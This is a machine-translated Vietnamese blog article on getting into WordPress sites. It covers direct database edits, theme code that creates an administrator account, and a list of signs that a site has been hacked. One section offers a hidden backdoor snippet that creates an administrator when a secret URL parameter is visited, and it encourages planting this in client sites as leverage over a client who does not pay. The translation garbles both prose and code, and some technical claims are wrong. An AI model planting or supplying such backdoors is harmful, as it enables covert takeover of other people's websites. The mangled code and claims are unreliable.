Cách hack vào trang web WordPress, Hướng dẫn hoàn chỉnh

Cách hack vào một trang web WordPress, hướng dẫn đầy đủ


Chúng tôi không chia buồn, chấp thuận hay khuyến khích bất kỳ hành vi bất hợp pháp hoặc độc hại nào! Mục đích của bài viết này là để giải thích cách hack hoặc lấy lại quyền truy cập vào trang web WordPress thuộc về bạn hoặc bạn có quyền chỉnh sửa, quản trị viên và truy cập. Dù bạn làm gì, bạn vẫn tự mình làm điều đó. Chúng tôi không chịu trách nhiệm cho hành động của bạn. Hướng dẫn này chỉ phục vụ cho mục đích giáo dục.

Các phương pháp được mô tả sẽ giúp bạn lấy lại quyền truy cập vào trang web ngay cả khi bạn không còn tài khoản, nhưng sẽ yêu cầu một số thông tin về trang web và họ đã giành chiến thắng giúp bạn hack vào bất kỳ cài đặt WordPress ngẫu nhiên nào.

Trong hướng dẫn này, chúng tôi sắp cho bạn thấy:

  • Cách hack vào trang web WordPress
  • Cách tạo backlink trong WordPress
  • Cách tạo tài khoản người dùng mới qua FTP
  • 10 dấu hiệu trang web WordPress của bạn bị hack

Cách hack vào một trang web WordPress, hướng dẫn đầy đủ

Tình huống bạn có thể giúp mình

Nếu bạn đạt được một trong các tình huống sau đây, các phương pháp của chúng tôi sẽ giúp bạn lấy lại quyền truy cập:

  • bạn quên tên người dùng hoặc địa chỉ email
  • đặt lại tùy chọn mật khẩu không hoạt động trên máy chủ lưu trữ
  • đặt lại email mật khẩu không thông qua
  • bạn không còn có quyền truy cập vào địa chỉ email của tài khoản
  • bạn biết tên người dùng và mật khẩu, nhưng sự kết hợp không hoạt động

Để sử dụng các phương pháp được mô tả dưới đây, bạn sẽ cần chỉ một trong những điều sau đây:

  • Truy cập FTP vào máy chủ hoặc
  • cPanel truy cập vào máy chủ, hoặc
  • truy cập vào cơ sở dữ liệu MySQL và khả năng kết nối với nó từ xa

Phương pháp số 1 – cách MySQL

Sử dụng phương pháp này để thay đổi mật khẩu (hoặc tên người dùng nếu cần) của người dùng hiện tại hoặc để tạo tài khoản mới. Bạn sẽ cần quyền truy cập cPanel hoặc truy cập MySQL trực tiếp vào cơ sở dữ liệu của trang web. Hãy bắt đầu bằng cách thay đổi mật khẩu của người dùng hiện tại.

Nếu bạn sử dụng cPanel, đăng nhập (cPanel luôn có thể được truy cập thông qua https://yoursite.com:2083 liên kết), định vị và mở phpMyAdmin. Danh sách các cơ sở dữ liệu và bảng ở bên trái. Bạn đang tìm kiếm cái bàn kết thúc bằng người dùng. Nó có thể là wp_users, nhưng nếu bạn có nhiều hơn một trang web WordPress được cài đặt trên máy chủ, bạn phải tìm đúng trang web.

Bảng bên phải sẽ có người dùng bạn muốn chỉnh sửa trong đó. Thực hiện theo quy trình tương tự nếu bạn kết nối với MySQL thông qua một số máy khách bên ngoài như SQLyog. Khi bạn xác định vị trí bảng và hồ sơ người dùng thực tế, sẽ đến lúc thay đổi mật khẩu.

Như bạn có thể nhận ra bây giờ, mật khẩu được lưu trong Mật khẩu người dùng trường, được băm bằng thuật toán MD5. Mở máy phát điện MD5 trực tuyến nhập mật khẩu bạn muốn sử dụng và nhấp vào Hash Hash ‘. Sao chép chuỗi đã tạo và thay thế mật khẩu ban đầu với nó. Trong phpMyAdmin, bạn có thể chỉnh sửa trường bằng cách nhấp đúp vào nó. Thủ tục tương tự trong các máy khách MySQL khác. Lưu các thay đổi và đăng nhập vào WordPress bằng mật khẩu mới của bạn.

Bảng người dùng WP

Tên người dùng, mật khẩu băm và email được lưu trữ trong wp_users bảng cơ sở dữ liệu

Vẫn theo phương pháp # 1 – tạo người dùng mới

Tạo người dùng mới phức tạp hơn một chút nhưng vẫn có thể quản lý được trong vòng chưa đầy một phút. Tạo một bản ghi mới trong bảng người dùng và điền: user_login, user_pass (được băm, sử dụng hàm MD5 được mô tả ở trên) và user_email. Tất cả các lĩnh vực khác có thể vẫn trống rỗng; họ không quan trọng. Lưu bản ghi mới. Sau khi lưu, MySQL sẽ cung cấp cho nó một ID duy nhất. Nó có số lượng trong trường ID. Nhớ nó.

Bây giờ đi đến _usermeta bàn. Nhớ lại, tiền tố bảng trong bảng phải giống với người dùng. Ví dụ wp_users và wp_usersmeta. Nếu tiền tố không giống nhau, bạn đã chỉnh sửa bảng sai (của một số cài đặt WP khác) và tài khoản mới giành được công việc của Keith. Chúng tôi sẽ tạo ra hai bản ghi mới. Bỏ qua umeta_id lĩnh vực cho cả hai. Bộ tên người dùng trường đến giá trị bạn vừa nhớ (giá trị ID mới trong bảng người dùng). Đối với bản ghi đầu tiên meta_key đến wpct_user_level và giá trị meta đến 10. Đối với cái thứ hai meta_key đến wpct_capabilities và giá trị meta đến a: 1: {s: 13: "quản trị viên"; b: 1;}. Lưu cả hai. Bạn đã hoàn thành – đăng nhập!

Phương thức # 2 – cách tests.php

Cách tiếp cận này có thể được sử dụng bằng cách chỉnh sửa hàm.php thông qua cPanel hoặc bằng cách sử dụng máy khách FTP để thực hiện. Nếu sử dụng cPanel, hãy tìm Trình quản lý tệp và mở nó. Đầu tiên, chúng ta phải tìm thư mục chủ đề tích cực.

Đi đến công khai_html / wp_content / chủ đề thư mục. Nếu bạn thấy ngay chủ đề của mình và biết đó là chủ đề gì – thật tuyệt. Mở thư mục của nó và bắt đầu chỉnh sửa Hàm.php. Nếu không, hãy mở trang web, nhấp chuột phải vào bất cứ nơi nào, chọn Xem Chế độ xem nguồn. Sau đó nhấn Ctrl + F và bắt đầu nhập / chủ đề / bạn sẽ sớm có rất nhiều URL được tô sáng và bạn sẽ nhận ra tên thư mục của chủ đề đang hoạt động.

Tìm nó trong cấu trúc tệp, mở và bắt đầu chỉnh sửa Hàm.php. Sao chép / dán đoạn mã sau vào cuối tập tin. Nhớ đóng cửa ?> Thẻ PHP nếu bạn có chúng. Họ phải ở dòng cuối cùng. Vì vậy, chèn mã trước chúng.

$ new_user_email = '[email protected]';
$ new_user_password = '12345';

if (! username_exists ($ new_user_email)) {
$ user_id = wp_create_user ($ new_user_email, $ new_user_password, $ new_user_email);

wp_update_user (mảng ('ID' => $ user_id, 'nickname' => $ new_user_email));

$ user = WP_User mới ($ user_id);
$ user-> set_role ('quản trị viên');
}

Chỉ chỉnh sửa hai dòng mã đầu tiên để phản ánh tài khoản mới của bạn. Nếu có một người dùng trong WP với email đó, một tài khoản mới sẽ được tạo ra, vì vậy hãy chắc chắn rằng nó mới. Thay đổi mật khẩu cũng vậy – don Patrick bị hack bởi kiddies script. Sau khi lưu tệp chỉ cần mở trang web của bạn, mã sẽ được chạy, một tài khoản mới với đặc quyền quản trị viên được tạo và bạn sẽ có thể đăng nhập với nó.

Sau khi bạn làm như vậy, hãy nhớ xóa mã từ Hàm.php.

Các phương pháp hack khác

Khi biết mật khẩu FTP, cPanel hoặc MySQL, bạn sẽ chứng minh rằng bạn có quyền truy cập hợp pháp vào máy chủ và do đó cũng nên có quyền truy cập vào (các) cài đặt WordPress. Nếu bạn không có bất kỳ tài khoản nào trong số đó, thì bạn sẽ không hoạt động tốt (hack vào các trang web của người khác) và điều đó không tốt!

Xin nhớ rằng việc truy cập trái phép vào bất kỳ máy tính, trang web hoặc máy chủ nào là một tội nghiêm trọng và được xử lý kịp thời ở hầu hết các quốc gia.

Nếu bạn sợ rằng trang web WordPress của bạn có thể bị hack, vui lòng kiểm tra trang này bằng trình quét bảo mật WordPress miễn phí. Nếu bạn không có thời gian để thiết lập blog của mình, hãy để chúng tôi làm điều đó cho bạn.

Cách tạo backlink trong WordPress

Khi cửa trước được đóng lại, bạn có thể thử cửa sau. Điều này có vẻ như là một cách độc hại khi sử dụng mã để vào trang web mà không có quyền truy cập vào nó, nhưng thực sự có những lúc bạn cần kiểm soát trang web của chính mình nếu ai đó đánh cắp nó.

Nếu nó tạo ra các trang web cho người khác một vài thứ bạn làm, sớm hay muộn sẽ có một khách hàng từ chối trả tiền cho bạn cho công việc của bạn; một khách hàng sẽ xóa thông tin đăng nhập của bạn và kiểm soát mọi thứ bạn đã làm. Đôi khi, nó sẽ đủ để tạo một người dùng mới thông qua FTP hoặc để đặt lại mật khẩu. Khi đó thì không đủ, bạn có thể muốn xâm nhập trở lại hoặc tạo quyền truy cập cửa sau vào các trang quản trị của bạn.

Nhưng nếu bạn quyết định giấu một đoạn mã nhỏ trong môi trường WordPress của mình, bạn có thể tiết kiệm cho mình một chút phẩm giá và truy cập vào trang web WordPress với quyền quản trị viên. Và đó là nơi mà các trò chơi bắt đầu.

Cho dù kẻ trộm này xóa thông tin của bạn bao nhiêu lần hoặc khôi phục bản sao lưu trên máy chủ mà anh ta có thể sở hữu, vẫn có khả năng anh ta không biết bất cứ điều gì về lối vào cửa sau. Nếu anh ta làm vậy, anh ta có lẽ sẽ cần sự giúp đỡ của bạn trong việc thiết lập WordPress, đúng không?

Tạo một cửa hậu:

OK, đủ với cuộc nói chuyện; Ở đây, một đoạn mã bạn sẽ cần để hoàn thành công việc:

  1. Mở tệp tin.php.
  2. Sao chép / Dán mã sau đây:
  3. add_action ('wp_head', 'wploop_backdoor');
    hàm wploop_backdoor () {
    If ($ _GET ['backdoor'] == 'knknock') {
    yêu cầu ('wp-gồm / register.php');
    If (! Username_exists ('tên người dùng')) {
    $ user_id = wp_create_user ('tên', 'vượt qua');
    $ user = WP_User mới ($ user_id);
    $ user-> set_role ('quản trị viên');
    }
    }
    }
    ?>
  4. Lưu thay đổi

Nếu bạn để lại mã như hiện tại, tất cả những gì bạn cần làm để tạo một quản trị viên mới trên trang web là truy cập http://www.yourdomain.com/?backdoor=knockknock

Sau khi trang được tải, tên người dùng mới của bạn là “Tên” và mật khẩu “vượt qua”.

Tất nhiên, bạn có thể thay đổi nó trong mã ở trên bằng cách thay đổi ’tên thùng và‘ vượt qua cho bất cứ điều gì bạn muốn. Bạn cũng có thể thay đổi liên kết đến cửa sau của mình bằng cách thay đổi ‘backdoor và / hoặc‘ knknknock đối với bất cứ điều gì bạn nghĩ ra.

Hãy thử chức năng – không chỉ thú vị mà nó thực sự có thể giúp bạn đôi khi trong tương lai khi bạn chuẩn bị tạo một trang web cho một người mà bạn có thể tin tưởng hoàn toàn. Bạn cũng nên tăng cấp WordPress và kỹ năng viết blog của mình.

Cách tạo tài khoản người dùng mới qua FTP

Tạo tài khoản người dùng mới trên WordPress rất dễ dàng. Là một quản trị viên, bạn cần phải điều hướng đến trang quản trị người dùng nơi bạn có thể tạo một tài khoản mới cho bất kỳ vai trò người dùng nào. Điều đó có thể được thực hiện trong vài giây và người dùng mới được tạo có thể đăng nhập ngay lập tức với tên người dùng và mật khẩu đã cho.

Nhưng điều gì xảy ra nếu bạn mất quyền truy cập vào quản trị viên WordPress của mình? Mọi thứ có thể phức tạp hơn một chút, nhưng đừng lo lắng – chúng tôi có một chức năng cho bạn có thể cứu mạng quản trị viên của bạn.

Cho dù quản trị viên khác đã xóa tài khoản của bạn, cho dù bạn đã xóa tất cả người dùng khỏi cơ sở dữ liệu, sử dụng plugin bị trục trặc hoặc bị hack, bạn vẫn có thể lấy lại quyền kiểm soát. Đôi khi, bạn chỉ có thể có quyền truy cập vào máy chủ FTP của mình trong khi HTTP sẽ nằm ngoài tầm với của bạn và bạn sẽ cần tạo một quản trị viên mới. Mặc dù đó có thể là một trường hợp hiếm gặp, chức năng sau đây sẽ giúp bạn tiết kiệm.

Để tạo một tài khoản mới bên ngoài môi trường quản trị WordPress, tất cả những gì bạn cần là truy cập FTP vào trang web của bạn. Là quản trị viên, bạn nên có tất cả thông tin cần thiết để đăng nhập vào máy chủ của mình và bạn có thể nhanh chóng tạo tài khoản mới bằng cách tạo một chức năng mới trong chủ đề của mình.

Tạo tài khoản người dùng mới qua FTP:

  1. Mở ứng dụng khách FTP và kết nối với tài khoản của bạn
  2. Điều hướng đến wp-content / chủ đề
  3. Mở thư mục của chủ đề bạn đang sử dụng
  4. Tìm kiếm tập tin tests.php và chỉnh sửa nó
  5. Sao chép và dán chức năng sau:
  6. hàm admin_account () {
    $ user = 'Tên người dùng';
    $ pass = 'Mật khẩu';
    $ email = '[email protected]';
    if (! username_exists ($ user) &&! email_exists ($ email)) {
    $ user_id = wp_create_user ($ user, $ pass, $ email);
    $ user = WP_User mới ($ user_id);
    $ user-> set_role ('quản trị viên');
    }}
    add_action ('init', 'admin_account');
    
  7. Thay đổi tên người dùng, mật khẩu và email thành một cái gì đó độc đáo
  8. Lưu thay đổi

Đảm bảo rằng tên người dùng, mật khẩu và địa chỉ email bạn đặt trong chức năng là duy nhất hoặc nếu không thì hàm won đã hoạt động đúng. Khi bạn đã lưu các thay đổi, bạn đã thực hiện xong và bạn có thể điều hướng đến bảng đăng nhập WP của mình. Sử dụng thông tin mới để đăng nhập lại và sau khi bạn đã xác minh tài khoản, bạn có thể xóa chức năng khỏi tệp tin.php..

Chức năng hiển thị ở trên tạo tài khoản quản trị nhưng bạn có thể dễ dàng sửa đổi nó để tạo tài khoản với bất kỳ vai trò người dùng nào khác. Đơn giản thay đổi vai trò trên 8thứ tự hàng của mã cho biên tập viên, tác giả, cộng tác viên, người đăng ký hoặc bất kỳ vai trò người dùng nào khác mà bạn đã tạo.

Thật không may, nếu bạn bị mất tài khoản quản trị, bạn cũng đã mất tất cả các bài viết được viết dưới tên người dùng đó. Đó là lý do tại sao bạn phải luôn luôn giữ một bản sao lưu mà bạn có thể dễ dàng lấy. Nếu bạn đọc nó trong khi có tài khoản quản trị viên của bạn, coi đây là một lời nhắc nhở để tạo một bản sao lưu ngay lập tức và đánh dấu bài viết này chỉ trong trường hợp bạn cần tạo một tài khoản bên ngoài WordPress trong tương lai.

10 dấu hiệu trang web WordPress của bạn bị hack

WordPress là một nền tảng blog khổng lồ. Có hàng triệu người dùng và dường như con số này đang tăng lên nhanh chóng mỗi ngày. Mọi người thậm chí có xu hướng chuyển các trang web của họ được tạo trong các hệ thống quản lý nội dung khác sang hệ thống nguồn mở này thường xuyên hơn bạn nghĩ. Và, trong khi điều này là tốt, điều này có nghĩa là tin tặc cũng sẽ đưa WordPress vào vị trí số một khi cố gắng xâm chiếm các trang web ngẫu nhiên.

Thông thường, nếu bạn bị hack, bạn sẽ biết về điều đó ngay lập tức. Trang web của bạn sẽ không thể truy cập được; bạn đã giành chiến thắng có thể đăng nhập và đôi khi một hacker thậm chí sẽ để lại tin nhắn trên trang nhất. Nhưng thường xuyên hơn không, bạn thậm chí có thể không nhận thấy rằng một cái gì đó đã thay đổi. Trong phần này của bài viết, chúng tôi sẽ giới thiệu cho bạn một số dấu hiệu có thể cho bạn thấy rằng trang web WordPress của bạn đã bị hack và một vài giải pháp cho vấn đề này.

1. Đăng nhập không thành công

Dấu hiệu này là khá rõ ràng. Nếu bạn đã sử dụng kết hợp tên người dùng và mật khẩu trong một thời gian mà không gặp sự cố, bạn có thể nghi ngờ nếu đột nhiên WordPress không nhận ra tài khoản của bạn. Nếu tin tặc phải đăng nhập vào trang web của bạn, rất có thể anh ta sẽ nhanh chóng thay đổi đặc quyền quản trị viên của bạn.

Có lẽ anh ta phải thay đổi mật khẩu của bạn hoặc xóa hoàn toàn tài khoản của bạn. Trước khi bạn bắt đầu hoảng loạn sau lần đầu tiên WordPress nhắn tin cho bạn về tên người dùng / mật khẩu không chính xác, vui lòng xem xét thực tế rằng bạn có thể đã nhập sai kết hợp hoặc bạn có thể đã bật nút khóa mũ.

Giải pháp: Hãy thử khôi phục mật khẩu qua email hoặc sử dụng tài khoản khác để đăng nhập lại. Để đảm bảo rằng bạn đăng nhập được an toàn, chúng tôi khuyên bạn nên cài đặt Đăng nhập Ninja plugin cho WordPress.

2. Nội dung độc hại được thêm vào trang web của bạn

Trang web chứa cảnh báo phần mềm độc hại

Nếu bạn bắt đầu nhận thấy nội dung lạ trên trang web của mình, bạn có thể bắt đầu lo lắng. Khi họ có cơ hội truy cập vào khu vực quản trị của bạn, tin tặc sẽ có thể thay đổi lõi của bạn và cả tập tin chủ đề và plugin của bạn. Điều đó có nghĩa là họ có thể thay đổi bất cứ điều gì họ muốn.

Mặc dù một số tin tặc sẽ sửa đổi mạnh mẽ giao diện trang web của bạn và thậm chí có thể đánh vần rằng bạn đã bị hack, những người khác sẽ tinh tế hơn nhiều về nó.

Giải pháp: Hãy thử tìm nội dung ẩn trong mã trang web. Có thể có các liên kết đến các trang web độc hại tin tặc được trồng ở chân trang của bạn hoặc chúng có thể đã cài đặt các cửa sổ bật lên sẽ mở thường xuyên cho khách hàng của bạn. Sử dụng Security Ninja để quét trang web của bạn hoặc liên tục theo dõi trang web của bạn để biết các vấn đề như vậy.

3. Chuyến thăm đáng ngờ

Nếu bạn không theo dõi trang web của mình, bạn nên bắt đầu làm ngay lập tức. Một cách đơn giản để làm là sử dụng Google Analytics, trong số nhiều tính năng khác, có thể cho bạn biết bạn nhận được bao nhiêu lượt truy cập và những lượt truy cập đó đến từ đâu. Sau một thời gian, bạn sẽ làm quen với trang web của bạn. Điều đó có nghĩa là bạn sẽ biết các lượt truy cập đến từ đâu, bạn sẽ biết khi nào bạn khởi chạy một chiến dịch mới và khi nào có các liên kết quảng cáo mới được phát hành trong tự nhiên.

Nhưng nếu bạn đột nhiên nhận thấy rằng trang web của bạn đang nhận được một số lượng lớn lượt truy cập mới từ tên miền đáng ngờ, bạn sẽ muốn điều tra thêm vì trang web của bạn có thể bị hack. Thông thường, loại lượt truy cập đó sẽ dẫn đến tỷ lệ thoát 100%, điều đó có nghĩa là chỉ có một trang được truy cập. Tin tặc sẽ thường xuyên sử dụng các hệ thống tự động sẽ dẫn các trang web xấu khác đến với bạn. Cho dù nó có mã xấu được thực thi trên trang web của bạn hay bạn đã trở thành một phần của mạng spam, mọi thứ có thể trở nên nghiêm trọng và bạn sẽ phải kiểm tra trang web của mình xem có mã độc không.

Giải pháp: Sử dụng Công cụ quản trị trang web của Google để tìm các miền đáng ngờ

4. Lưu lượng truy cập giảm đột ngột

Trình duyệt trang web an toàn

Không giống như dấu hiệu bị hack cuối cùng được đề cập, cái này có thể cảnh báo bạn vì đột nhiên số lượng truy cập giảm. Thay vì giới thiệu các chuyến thăm mới cho bạn, một tin tặc có thể gửi các lượt truy cập từ trang web của bạn. Điều này có thể xảy ra vì một hacker đã chuyển hướng trang web của bạn sang một trang khác. Lý do khác để có ít khách truy cập hơn là Google đưa vào danh sách đen trang web của bạn. Hành động này sẽ hiển thị một thông báo cho mọi người dùng có thể chọn không mở trang web của bạn vì nó bị nhiễm.

Giải pháp: Sử dụng Google xếp hạng Trạng thái trang web duyệt web an toàn để kiểm tra xem trang web của bạn được đánh dấu là không an toàn và hiện nguy hiểm khi truy cập.

5. Kết quả công cụ tìm kiếm là lạ

Nếu bạn không nhận thấy bất kỳ thay đổi nào trên trang web của mình, nhưng bạn phát hiện ra rằng kết quả tìm kiếm trong Google và các công cụ tìm kiếm khác là lạ (hiển thị các tiêu đề khác nhau và dữ liệu meta khác), đây có thể là dấu hiệu rõ ràng của một trang web bị tấn công. Một hacker có thể đã thay đổi nội dung của bạn theo cách chỉ có thể nhìn thấy đối với một chuyên gia. Tuy nhiên, thay đổi sẽ hiển thị trong kết quả của công cụ tìm kiếm.

Giải pháp: Kiểm tra trang web của bạn với Công cụ quản trị trang web của Google, và kiểm tra xem trang web của bạn có bị hack không công cụ trực tuyến miễn phí.

6. Bạn có thể gửi / nhận email

Khi một hacker có quyền truy cập vào trang web của bạn, anh ta có thể sẽ muốn sử dụng máy chủ của bạn để spam mọi người khác. Khi bạn phát hiện ra rằng bạn có thể gửi hoặc gửi email mới từ WordPress của bạn, đây có thể là một dấu hiệu rõ ràng cho thấy bạn đã bị hack. Kiểm tra email của bạn một lần nữa, sau đó kiểm tra nó với nhà cung cấp của bạn để đảm bảo rằng không có lỗi nào xảy ra.

Giải pháp: Kiểm tra WordPress của bạn chức năng thư với plugin miễn phí này.

7. Trang web không tồn tại

Không tìm thấy máy chủ

Đôi khi tin tặc đã giành được truy cập vào trang web của bạn để tạo mã độc, chuyển hướng người dùng hoặc sử dụng email của bạn để spam. Đôi khi, tất cả những gì họ sẽ muốn làm là đánh sập trang web của bạn. Hiếm khi, một hacker sẽ xóa thành công mọi thứ khỏi toàn bộ máy chủ. Đó là lý do tại sao điều quan trọng là bạn lưu trữ các tệp của mình tại một công ty lưu trữ nổi tiếng sẽ bảo mật và cũng giữ các bản sao lưu hàng ngày hoặc ít nhất là hàng tuần của trang web của bạn. Đó là một cách thực hành tốt mà thỉnh thoảng bạn cũng tự sao lưu để trang web có thể được khôi phục nhanh chóng.

Giải pháp: Cài đặt một trong những plugin tốt nhất để quản lý sao lưu trong WordPress.

8. Tập tin đáng ngờ

Tương tự như nội dung độc hại có thể được thêm vào các tệp hiện có, một hacker có thể trồng thêm các tập tin ở bất cứ đâu trong thư mục gốc của bạn. Đó là một điều tốt để biết cách của bạn xung quanh WordPress, nhưng nếu bạn không có kinh nghiệm, bạn nên có một công cụ bảo mật theo ý của bạn để có thể kiểm tra tất cả các tệp và hoạt động của bạn. Gần đây, chúng tôi đã xem xét Security Ninja, một công cụ hoàn hảo để kiểm tra tất cả các tệp WordPress của bạn.

Giải pháp: Hãy thử tìm kiếm các tập tin don don thuộc về cài đặt WordPress của bạn. Sử dụng Security Ninja để quét trang web của bạn một cách thường xuyên và tự động tìm các tệp đó. Sau đó xóa các tệp hoặc xóa mã độc khỏi các tệp bị nhiễm. Đừng để quên tiện ích bổ sung Máy quét lõi cho Security Ninja.

9. Thành viên mới

Tùy thuộc vào trang web của bạn, bạn có thể là người duy nhất có thể thêm thành viên mới. Trong trường hợp đó, một email cho bạn biết về người dùng mới đăng ký có thể kích hoạt báo động. Nếu có quản trị viên khác có khả năng thêm thành viên mới, hãy kiểm tra với họ về hoạt động đáng ngờ.

Giải pháp: Thay đổi URL đăng nhập bằng một plugin miễn phí, giới hạn quyền truy cập vào trang đăng nhập WordPress của bạn bằng cách sử dụng tệp .htpasswd và sử dụng Ninja đăng nhập để bảo vệ biểu mẫu đăng nhập của bạn mọi lúc.

10. Kiểm tra các sự kiện theo lịch trình trên máy chủ của bạn

Đôi khi, một hacker đã giành chiến thắng trên mạng của bạn khi họ tìm được đường vào. Thay vào đó, họ sẽ rời khỏi các sự kiện theo lịch trình điều này có thể gây hại cho trang web của bạn đôi khi trong tương lai. Kỹ thuật này rất nguy hiểm vì ban đầu một hacker có thể khiến nạn nhân thiếu kinh nghiệm không biết gì. Bạn có thể bị nhiễm bệnh và không biết gì về nó.

Giải pháp: Kiểm tra công việc CRON của bạn trên máy chủ mà bạn sử dụng và đảm bảo không có tác vụ theo lịch trình đáng ngờ.

Gói lại

Chúng tôi hy vọng rằng bài viết này sẽ giúp bạn quản lý ngay cả một trang web WordPress an toàn hơn và nó sẽ giúp bạn lấy lại quyền truy cập vào nó trong các tình huống xấu. Và ngay cả khi trang web của bạn sạch sẽ, xin vui lòng không nhận điều đó.
Luôn đảm bảo rằng blog của bạn an toàn nhất có thể. Chúng tôi đề xuất các plugin bảo mật cho WordPress có thể giúp bạn tiết kiệm nhiều lần. Tuy nhiên, donith là người sử dụng mật khẩu không an toàn và hãy cẩn thận khi hack vào trang web WordPress của riêng bạn.
Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
    Like this post? Please share to your friends:
    Adblock
    detector
    map